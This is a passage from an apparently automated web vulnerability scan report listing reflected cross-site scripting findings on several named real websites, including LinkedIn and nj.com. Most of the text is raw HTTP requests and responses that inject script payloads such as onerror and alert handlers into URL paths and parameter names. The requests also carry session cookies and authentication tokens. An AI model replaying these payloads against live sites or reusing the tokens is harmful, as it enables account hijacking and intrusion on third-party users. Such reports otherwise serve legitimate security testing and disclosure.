Cookie: JSESSIONID=EDEB5B7C5BC6F41E7947F6C8D04D0F33.webserver4; __unam=3e3577f-12cc309077b-2ca9e758-1; division=4cd325748cb61d7889ee5617; __utmz=158454956.1291762338.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=158454956.578824552.1291762338.1291762338.1291762338.1; __utmc=158454956; __utmb=158454956.1.10.1291762338; visitor=4cfebadb79f41d7858c136a3;
Response
HTTP/1.1 200 OK
Server: nginx/0.7.66
Date: Wed, 08 Dec 2010 05:54:53 GMT
Content-Type: text/html;charset=utf-8
Connection: close
Set-Cookie: JSESSIONID=9A5B15CA98F87264FCDE940166275E1B.webserver4; Path=/
Set-Cookie: division=4cd325748cb61d7889ee5617; Expires=Thu, 08-Dec-2011 05:58:05 GMT; Path=/
Content-Length: 83
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 24f51<img%20src%3da%20onerror%3dalert(1)>d783beb3494 was submitted in the REST URL parameter 1. This input was echoed as 24f51<img src=a onerror=alert(1)>d783beb3494 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /privacy24f51<img%20src%3da%20onerror%3dalert(1)>d783beb3494 HTTP/1.1
Host: www.gotdailydeals.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=EDEB5B7C5BC6F41E7947F6C8D04D0F33.webserver4; __unam=3e3577f-12cc309077b-2ca9e758-1; division=4cd325748cb61d7889ee5617; __utmz=158454956.1291762338.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=158454956.578824552.1291762338.1291762338.1291762338.1; __utmc=158454956; __utmb=158454956.1.10.1291762338; visitor=4cfebadb79f41d7858c136a3;
Response
HTTP/1.1 200 OK
Server: nginx/0.7.66
Date: Wed, 08 Dec 2010 05:53:44 GMT
Content-Type: text/html;charset=utf-8
Connection: close
Set-Cookie: JSESSIONID=4806B5019D14BA0835BFCBD8CF877D37.webserver4; Path=/
Set-Cookie: division=4cd325748cb61d7889ee5617; Expires=Thu, 08-Dec-2011 05:56:56 GMT; Path=/
Content-Length: 67
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f9e2b<img%20src%3da%20onerror%3dalert(1)>1b4ed707cc was submitted in the REST URL parameter 1. This input was echoed as f9e2b<img src=a onerror=alert(1)>1b4ed707cc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /rf9e2b<img%20src%3da%20onerror%3dalert(1)>1b4ed707cc HTTP/1.1
Host: www.gotdailydeals.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=EDEB5B7C5BC6F41E7947F6C8D04D0F33.webserver4; __unam=3e3577f-12cc309077b-2ca9e758-1; division=4cd325748cb61d7889ee5617; __utmz=158454956.1291762338.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=158454956.578824552.1291762338.1291762338.1291762338.1; __utmc=158454956; __utmb=158454956.1.10.1291762338; visitor=4cfebadb79f41d7858c136a3;
Response
HTTP/1.1 200 OK
Server: nginx/0.7.66
Date: Wed, 08 Dec 2010 05:51:52 GMT
Content-Type: text/html;charset=utf-8
Connection: close
Set-Cookie: JSESSIONID=5CA8A4D914691121FC393E508C477F4E.webserver4; Path=/
Set-Cookie: division=4cd325748cb61d7889ee5617; Expires=Thu, 08-Dec-2011 05:55:04 GMT; Path=/
Content-Length: 60
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 51740<img%20src%3da%20onerror%3dalert(1)>dd7d4c8da25 was submitted in the REST URL parameter 1. This input was echoed as 51740<img src=a onerror=alert(1)>dd7d4c8da25 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sb51740<img%20src%3da%20onerror%3dalert(1)>dd7d4c8da25 HTTP/1.1
Host: www.gotdailydeals.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=EDEB5B7C5BC6F41E7947F6C8D04D0F33.webserver4; __unam=3e3577f-12cc309077b-2ca9e758-1; division=4cd325748cb61d7889ee5617; __utmz=158454956.1291762338.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=158454956.578824552.1291762338.1291762338.1291762338.1; __utmc=158454956; __utmb=158454956.1.10.1291762338; visitor=4cfebadb79f41d7858c136a3;
Response
HTTP/1.1 200 OK
Server: nginx/0.7.66
Date: Wed, 08 Dec 2010 05:50:56 GMT
Content-Type: text/html;charset=utf-8
Connection: close
Set-Cookie: JSESSIONID=2EB6E83955C5804D3BB10197364ACA52.webserver4; Path=/
Set-Cookie: division=4cd325748cb61d7889ee5617; Expires=Thu, 08-Dec-2011 05:54:08 GMT; Path=/
Content-Length: 62
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a310c<img%20src%3da%20onerror%3dalert(1)>476d0e05a76 was submitted in the REST URL parameter 1. This input was echoed as a310c<img src=a onerror=alert(1)>476d0e05a76 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sba310c<img%20src%3da%20onerror%3dalert(1)>476d0e05a76/ HTTP/1.1
Host: www.gotdailydeals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ae842<img%20src%3da%20onerror%3dalert(1)>d89460aad33 was submitted in the REST URL parameter 1. This input was echoed as ae842<img src=a onerror=alert(1)>d89460aad33 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /subscribeae842<img%20src%3da%20onerror%3dalert(1)>d89460aad33 HTTP/1.1
Host: www.gotdailydeals.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=EDEB5B7C5BC6F41E7947F6C8D04D0F33.webserver4; __unam=3e3577f-12cc309077b-2ca9e758-1; division=4cd325748cb61d7889ee5617; __utmz=158454956.1291762338.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=158454956.578824552.1291762338.1291762338.1291762338.1; __utmc=158454956; __utmb=158454956.1.10.1291762338; visitor=4cfebadb79f41d7858c136a3;
Response
HTTP/1.1 200 OK
Server: nginx/0.7.66
Date: Wed, 08 Dec 2010 05:54:53 GMT
Content-Type: text/html;charset=utf-8
Connection: close
Set-Cookie: JSESSIONID=139F635B24AD6529BA964336CEE61E5D.webserver4; Path=/
Set-Cookie: division=4cd325748cb61d7889ee5617; Expires=Thu, 08-Dec-2011 05:58:05 GMT; Path=/
Content-Length: 69
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 61294<img%20src%3da%20onerror%3dalert(1)>c80331e3f3c was submitted in the REST URL parameter 1. This input was echoed as 61294<img src=a onerror=alert(1)>c80331e3f3c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tou61294<img%20src%3da%20onerror%3dalert(1)>c80331e3f3c HTTP/1.1
Host: www.gotdailydeals.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=EDEB5B7C5BC6F41E7947F6C8D04D0F33.webserver4; __unam=3e3577f-12cc309077b-2ca9e758-1; division=4cd325748cb61d7889ee5617; __utmz=158454956.1291762338.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=158454956.578824552.1291762338.1291762338.1291762338.1; __utmc=158454956; __utmb=158454956.1.10.1291762338; visitor=4cfebadb79f41d7858c136a3;
Response
HTTP/1.1 200 OK
Server: nginx/0.7.66
Date: Wed, 08 Dec 2010 05:53:07 GMT
Content-Type: text/html;charset=utf-8
Connection: close
Set-Cookie: JSESSIONID=4ECA3FB8E749F2155B4625A58FD1A41D.webserver4; Path=/
Set-Cookie: division=4cd325748cb61d7889ee5617; Expires=Thu, 08-Dec-2011 05:56:19 GMT; Path=/
Content-Length: 63
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3657d<img%20src%3da%20onerror%3dalert(1)>4d249cbba51 was submitted in the REST URL parameter 2. This input was echoed as 3657d<img src=a onerror=alert(1)>4d249cbba51 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /widgets/sbpromo3657d<img%20src%3da%20onerror%3dalert(1)>4d249cbba51 HTTP/1.1
Host: www.gotdailydeals.com
Proxy-Connection: keep-alive
Referer: http://www.mercurynews.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: nginx/0.7.66
Date: Wed, 08 Dec 2010 00:44:37 GMT
Content-Type: text/html;charset=utf-8
Connection: keep-alive
Content-Length: 80
Could not find the template: sbpromo3657d<img src=a onerror=alert(1)>4d249cbba51
4.265. http://www.kledy.de/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.kledy.de
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21f0b"><script>alert(1)</script>88d7309f779 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?21f0b"><script>alert(1)</script>88d7309f779=1 HTTP/1.1
Host: www.kledy.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <!----> <html dir="ltr" lang="de"> <head>
<meta name="description" content="Aktuelle Nachrichten und Videos aus Politik, Wirtschaft ...[SNIP]... <a href="?page=2&21f0b"><script>alert(1)</script>88d7309f779=1" class="pages"> ...[SNIP]...
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 5a973<script>alert(1)</script>7daff1e3d1a was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /company/api/recommendation/count?type=PDCT&id={PRODUCT_ID}&callback={CALLBACK}5a973<script>alert(1)</script>7daff1e3d1a HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bcookie="v=1&3df6502f-5c97-409c-8cd3-d395e4567acc"; JSESSIONID="ajax:5324119329288230667"; leo_auth_token="GST:8Pm3saOjKwdRQW1b_gmjIOrLHpj7BjiixoCj705e4hs9yWOVg-A8gp:1291762396:22338e7655f074ee0c212a56c53d66234d81bb7e"; s_leo_auth_token="delete me"; visit=G;
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Set-Cookie: leo_auth_token="GST:8XxGwg3YRVicIzvLNkgDYNZCh-48PRwUJTgW6-3HpVJ821h2lRUUmN:1291788303:ea329ed8082db683332ab0faabadcf47d5e94acc"; Version=1; Max-Age=1799; Expires=Wed, 08-Dec-2010 06:35:02 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/javascript;charset=UTF-8
Content-Language: en-US
Content-Length: 54
Date: Wed, 08 Dec 2010 06:05:02 GMT
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8fde'-alert(1)-'a99a27b930d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /uase8fde'-alert(1)-'a99a27b930d/connect/logout HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bcookie="v=1&3df6502f-5c97-409c-8cd3-d395e4567acc"; JSESSIONID="ajax:5324119329288230667"; leo_auth_token="GST:8Pm3saOjKwdRQW1b_gmjIOrLHpj7BjiixoCj705e4hs9yWOVg-A8gp:1291762396:22338e7655f074ee0c212a56c53d66234d81bb7e"; s_leo_auth_token="delete me"; visit=G;
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: leo_auth_token="GST:Znm51HR3XEBl__-t6f1phW0quoBKN2hGYXMPAcA7FEW_gc-D6CnGfw:1291788325:32d68211411ff2e0e766cc2bb9a8b4c170d01a5f"; Version=1; Max-Age=1799; Expires=Wed, 08-Dec-2010 06:35:24 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 1008
Date: Wed, 08 Dec 2010 06:05:24 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf1920ba45525d5f4f58455e445a4a4229a3;expires=Wed, 08-Dec-2010 06:35:11 GMT;path=/;httponly
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d586'-alert(1)-'1f1309e7d43 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /uas7d586'-alert(1)-'1f1309e7d43/connect/user-signin HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bcookie="v=1&3df6502f-5c97-409c-8cd3-d395e4567acc"; JSESSIONID="ajax:5324119329288230667"; leo_auth_token="GST:8Pm3saOjKwdRQW1b_gmjIOrLHpj7BjiixoCj705e4hs9yWOVg-A8gp:1291762396:22338e7655f074ee0c212a56c53d66234d81bb7e"; s_leo_auth_token="delete me"; visit=G;
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: leo_auth_token="GST:ZJax0Fz9w3zoVDl_63a8JOLLJ9RkYhL_x9OTmUReYlLZEV8lvfXxOk:1291788329:17f78c2d2a3ddff5e5c4a2427a67fa43dac15e3a"; Version=1; Max-Age=1799; Expires=Wed, 08-Dec-2010 06:35:28 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 1023
Date: Wed, 08 Dec 2010 06:05:29 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19208245525d5f4f58455e445a4a4229a3;expires=Wed, 08-Dec-2010 06:35:15 GMT;path=/;httponly
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60433'-alert(1)-'75daf4e8920 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /uas60433'-alert(1)-'75daf4e8920/js/authuserspace HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bcookie="v=1&3df6502f-5c97-409c-8cd3-d395e4567acc"; JSESSIONID="ajax:5324119329288230667"; leo_auth_token="GST:8Pm3saOjKwdRQW1b_gmjIOrLHpj7BjiixoCj705e4hs9yWOVg-A8gp:1291762396:22338e7655f074ee0c212a56c53d66234d81bb7e"; s_leo_auth_token="delete me"; visit=G;
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: leo_auth_token="GST:9aLFNYoZ2p5YT9y3IKLnQGsxSB1HgnHRI0Lp-jI_sD5yBUG3sSoZqS:1291788322:0fb9f795d5ac7180da759bf85d531cc1e88f02f2"; Version=1; Max-Age=1799; Expires=Wed, 08-Dec-2010 06:35:21 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 1014
Date: Wed, 08 Dec 2010 06:05:21 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf195e6945525d5f4f58455e445a4a4229a3;expires=Wed, 08-Dec-2010 06:35:07 GMT;path=/;httponly
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7bacc'-alert(1)-'d6fd20ee539 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /uas7bacc'-alert(1)-'d6fd20ee539/js/userspace HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bcookie="v=1&3df6502f-5c97-409c-8cd3-d395e4567acc"; JSESSIONID="ajax:5324119329288230667"; leo_auth_token="GST:8Pm3saOjKwdRQW1b_gmjIOrLHpj7BjiixoCj705e4hs9yWOVg-A8gp:1291762396:22338e7655f074ee0c212a56c53d66234d81bb7e"; s_leo_auth_token="delete me"; visit=G;
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: leo_auth_token="GST:8XmmWZ9s7Q6Qw-2-ifO4ATffzSExyyNJE91Cqrfedl6Txy2Bn7hSCd:1291788319:372ec7802f575f43695457184630255da5e833ee"; Version=1; Max-Age=1799; Expires=Wed, 08-Dec-2010 06:35:18 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 1002
Date: Wed, 08 Dec 2010 06:05:18 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19209045525d5f4f58455e445a4a4229a3;expires=Wed, 08-Dec-2010 06:35:05 GMT;path=/;httponly
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8bd13'-alert(1)-'8352e87b04a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /uas8bd13'-alert(1)-'8352e87b04a/oauth2/authorize HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bcookie="v=1&3df6502f-5c97-409c-8cd3-d395e4567acc"; JSESSIONID="ajax:5324119329288230667"; leo_auth_token="GST:8Pm3saOjKwdRQW1b_gmjIOrLHpj7BjiixoCj705e4hs9yWOVg-A8gp:1291762396:22338e7655f074ee0c212a56c53d66234d81bb7e"; s_leo_auth_token="delete me"; visit=G;
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: leo_auth_token="GST:8GoKMGFbZUFIGRKfogxEKGbJy8SIqffLExNZrdXbl3F2u30f7mgodA:1291788335:aff235b8533c1883201dceff364b5bf6391209e2"; Version=1; Max-Age=1799; Expires=Wed, 08-Dec-2010 06:35:34 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 1014
Date: Wed, 08 Dec 2010 06:05:34 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf1920b445525d5f4f58455e445a4a4229a3;expires=Wed, 08-Dec-2010 06:35:21 GMT;path=/;httponly
4.272. http://www.mathias-bank.de/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.mathias-bank.de
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc53b"><script>alert(1)</script>c2312ffc5b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dc53b\"><script>alert(1)</script>c2312ffc5b5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?dc53b"><script>alert(1)</script>c2312ffc5b5=1 HTTP/1.1
Host: www.mathias-bank.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 06:03:54 GMT
Server: Apache/2.2.8 (Ubuntu)
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://www.mathias-bank.de/xmlrpc.php
Set-Cookie: bb2_screener_=1291788235+174.121.222.18; path=/
Set-Cookie: PHPSESSID=cb0368b6825d4db60b25842eaac87799; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54880
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/x ...[SNIP]... <a href="/?dc53b\"><script>alert(1)</script>c2312ffc5b5=1/lang-pref/en/"> ...[SNIP]...
4.273. http://www.netvouz.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.netvouz.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c150d"><script>alert(1)</script>654dba14884 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?c150d"><script>alert(1)</script>654dba14884=1 HTTP/1.1
Host: www.netvouz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 07:26:06 GMT
Server: IBM_HTTP_Server
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR NOR UNI COM NAV"
Set-Cookie: JSESSIONID=0000ks_3VvqlBbQydKeP_fVaGme:-1; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 20724
4.274. http://www.nj.com/devils/index.ssf/devilsbeatreportersblog/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.nj.com
Path: /devils/index.ssf/devilsbeatreportersblog/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49653'-alert(1)-'fefbcb3b6d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /devils/index.ssf/devilsbeatreportersblog/?49653'-alert(1)-'fefbcb3b6d0=1 HTTP/1.1
Host: www.nj.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache
P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM'
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 07:35:07 GMT
Date: Wed, 08 Dec 2010 07:35:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42817
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf- ...[SNIP]... istpos = 'Leaderboard,SponsorLeft,Rectangle,SkyScraper2,Button2,BannerBottom,SiteSponsor,TxtLink1,TxtLink2,TxtLink3,TxtLink4,Feature1,Feature2,Feature3,Feature4,ImpactAd,BannerShared';
4.275. http://www.protopage.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.protopage.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6928c'%3balert(1)//c026ddc794a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6928c';alert(1)//c026ddc794a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?6928c'%3balert(1)//c026ddc794a=1 HTTP/1.1
Host: www.protopage.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
